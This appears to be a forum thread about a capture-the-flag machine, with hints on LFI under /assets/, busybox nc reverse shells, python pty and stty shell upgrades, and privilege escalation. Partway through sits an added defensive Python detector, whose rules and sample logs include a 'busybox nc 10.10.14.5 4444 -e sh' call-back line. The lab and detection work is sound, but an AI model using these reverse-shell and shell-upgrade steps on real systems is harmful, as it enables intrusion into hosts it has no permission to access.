Hey there, I’m having the same issue here. When I try to get a revshell using the busybox with nc I get a hit on my terminal saying “connect …” but the shell doesn’t spawn…
I port forwarded using ssh,
then I curled the website and learned that /assets/ was the folder being accessed for static files (“.css”, “.js”)
You can also just curl the website locally:
User rosa> curl localhost:8080/assets/
lfi
Just type something in the terminal like “LS”
OMFG, I’m dumb.
Can you explain to me why the path doesn’t appear?
Because it didn’t appear, I thought the shell didn’t spawn.
That’s how you learn: you work till your brain is fried, get up and repeat. Trial and error, my friend.
Sometimes the shell won’t spawn after connecting. You’ll come across this a lot. Maybe someone more experienced can explain why. If you see the message that says you’re connected, then run id, whoami, ls or similar commands to see if you’re connected to the target. When you get an output, you can use script or python to spawn a shell. Let me know if you need a couple of one-liners.
Because you had a poor shell; poor shells don’t really support anything other than commands and output.
Upgrade it using python pty (search online for “python upgrade shell”), and use python3 since it’s the version the box is using.
One thing that got me, and you may already be doing this so forgive me if this doesn’t help, but I missed initially when the shell was spawning because all I saw was a message saying I’d received a connection back to my listener, which was exactly what I’d been getting for all the payloads that didn’t work. It was only when I actually typed whoami or ls or something and got the output from the command that I realized the reverse shell had actually worked. So be sure to try sending a command when you get that back-connect to test if the revshell actually worked.
In my browser when accessing the page I just used View Page Source and visually grep’d for any links. That’s where I saw assets existed. You don’t have to fuzz to get some initial ideas of directories and things if you see them in the page source. Of course, fuzzing will be more complete, but checking the source will let you find things right away as well as find things that may not be in your fuzzing wordlists.
This is a great thing to do to upgrade your shell. I use this all the time. Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog, specifically “Method 3: Upgrading from netcat with magic”.
Basically it boils down to this:
Spawn a shell, like with one of these:
python -c 'import pty; pty.spawn("/bin/bash")'
or python3 -c 'import pty; pty.spawn("/bin/bash")' if you need to specify Python3.
Then do this:
- Background the shell by pressing Ctrl-Z
- Run echo $TERM; stty -a
- Make a note of the rows and columns values from the output, as you’ll need these in a moment.
- With the shell still in the background, type stty raw -echo. Note that after this you won’t see what you type in the shell because it is in raw mode.
- Then foreground the shell with fg and type reset. Now, after the reset, you’ll be able to see again what you type. If it asks you for the TERM type, just type xterm.
- Now run:
export SHELL=bash
export TERM=xterm
(this is likely not needed if you specified the TERM type already)
stty rows [value] columns [value]
(this makes sure lines wrap correctly in your terminal window!)
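From the defender’s side, the chain described in this thread (a busybox/nc call-back from a web-server user, followed by the python pty or script trick to upgrade the dumb shell) is also a useful thing to hunt for in process-execution telemetry. The following is an added example, not code from the thread or from the box: it runs a few indicator rules over constructed process-start log lines in an assumed “timestamp pid ppid user comm cmdline” format, and links each pty-upgrade hit to a reverse-shell launcher in its parent chain so that an administrator spawning a pty from a normal login is not scored the same way.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumed (constructed) log format, one process start per line:
#   <timestamp> <pid> <ppid> <user> <comm> <cmdline...>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<user>\S+)\s+"
    r"(?P<comm>\S+)\s+(?P<cmdline>.*)$"
)

# Indicator patterns for the behaviours discussed in the thread: a (busybox) nc
# call-back that hands out a shell with -e, and the python pty / script tricks
# used to upgrade a dumb shell on the target.
RULES = {
    "reverse_shell_nc": re.compile(r"\b(busybox\s+)?nc\b.*\s-e\s+\S*sh\b"),
    "pty_upgrade_python": re.compile(r"\bpython[23]?\b.*pty\.spawn\("),
    "pty_upgrade_script": re.compile(r"\bscript\b.*(-qc|-c)\s+\S*sh\b"),
}

# Constructed sample telemetry (not real logs): a web-server user gets a
# call-back shell and upgrades it, plus some benign noise and an admin who
# spawns a pty from an ordinary session with no reverse-shell ancestor.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 4120 4001 www-data sh sh -c busybox nc 10.10.14.5 4444 -e sh
2024-01-01T10:00:02Z 4121 4120 www-data python3 python3 -c import pty; pty.spawn("/bin/bash")
2024-01-01T10:00:03Z 4122 4121 www-data bash bash
2024-01-01T10:00:10Z 4130 4121 www-data stty stty rows 38 columns 150
2024-01-01T10:00:11Z 4131 4121 www-data script script -qc /bin/bash /dev/null
2024-01-01T10:05:00Z 5001 1 root cron /usr/sbin/cron -f
2024-01-01T10:05:01Z 5002 5001 rosa python3 python3 /opt/app/report.py
2024-01-01T10:05:02Z 5003 5001 rosa nc nc -zv 10.10.14.5 80
2024-01-01T10:06:00Z 6001 6000 rosa python3 python3 -c import pty; pty.spawn("/bin/bash")
"""


@dataclass
class Proc:
    ts: str
    pid: int
    ppid: int
    user: str
    comm: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    pid: int
    user: str
    cmdline: str
    ancestors: List[int]        # pids walked upward from ppid, nearest first
    linked_to_revshell: bool    # True if this is, or descends from, a call-back shell


def parse_log(text: str) -> List[Proc]:
    """Parse the assumed line format; malformed lines are skipped, not fatal."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        procs.append(Proc(m["ts"], int(m["pid"]), int(m["ppid"]),
                          m["user"], m["comm"], m["cmdline"]))
    return procs


def ancestors(pid: int, by_pid: Dict[int, Proc], limit: int = 10) -> List[int]:
    """Walk the parent chain as far as the log lets us (bounded to avoid loops)."""
    chain: List[int] = []
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and len(chain) < limit:
        chain.append(cur.ppid)
        cur = by_pid[cur.ppid]
    return chain


def detect(text: str) -> List[Finding]:
    """Apply the rules in log order and correlate pty upgrades with their parents."""
    procs = parse_log(text)
    by_pid = {p.pid: p for p in procs}
    revshell_pids = set()
    findings: List[Finding] = []
    for p in procs:
        for name, pattern in RULES.items():
            if not pattern.search(p.cmdline):
                continue
            chain = ancestors(p.pid, by_pid)
            is_launcher = name == "reverse_shell_nc"
            if is_launcher:
                revshell_pids.add(p.pid)
            linked = is_launcher or any(a in revshell_pids for a in chain)
            findings.append(Finding(name, p.pid, p.user, p.cmdline, chain, linked))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        flag = "LINKED" if f.linked_to_revshell else "standalone"
        print(f"[{flag}] {f.rule}: pid={f.pid} user={f.user} parents={f.ancestors} :: {f.cmdline}")
```

The point of the parent-chain walk is that `pty.spawn` on its own is a weak signal (administrators use it too); the same command descending from a process that called out with `nc -e` is a much stronger one. On a real host the cmdline and parent data would come from auditd `EXECVE` records or an EDR, which format fields differently than the constructed lines above, so `LINE_RE` is the part to swap out.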
I’m trying the busybox nc payload but there’s no indication that it’s listening like I see when I run nc. I tried the whoami command and there was no response to the command in the terminal.
Well, to be clear, the payload doesn’t listen, it calls out to your listener on your attack box. More specifically it initiates a TCP connection - if you’re using TCP for the connection - to your listener. But that’s probably what you meant.
Feel free to PM me the commands you’re using, both the revshell command you’re spawning in the exploit and the command you’re using to start your listener. I’d be happy to take a look and sanity check things for you if you like.
Guys, how can I escalate my privileges to root? Pls help, I’m stuck at this step.
There are already some tips on the forum here. Assuming you have user access already, make sure you enumerate other things that may be running on the host and then check for vulnerabilities in those things.
I found a privilege escalation vulnerability that involves the umount command, and I uploaded the exploit code, but it seems like nothing happened when I ran it.
Targeting the umount binary is not the path I used. There’s something else actively running on the host. Think about the first step you ran to enumerate the target. The very first thing you most likely did, the first command you ran to send any packets to the target. Then think about how that enumerated for you things running on the target. Well, sometimes there are things like that you can’t see when you’re poking at a target remotely…but you can see those other things once you have a shell on the target. Those things can be enumerated just like you did at the beginning, as long as you use the right command options, or can be enumerated using other commands. They even show up as part of the standard linpeas output - though there’s a bunch of other stuff in linpeas output that can send you down rabbit holes too - but it just shows it’s a thing to always check when you get a foothold on a target. Send me a private message if you’re still stuck and I can try to coach you through the thought process so you can figure it out.
I’m so confused. I found the db and the other user on the machine, but it doesn’t work with ssh even with the cracked password, and the db has my information in it as well? Anyone pls give me a hint.
The DB has your info in as well because you created an account using the web interface, right? One of the passwords you got from there should let you get a more normal shell on the target.
this is still pretty vague, any other hints would be much appreciated
Yeah, still trying to be general here in the public forum. Direct messages, that only you see, are a different matter - I’m happy to be a bit more direct there to help get you on the right track.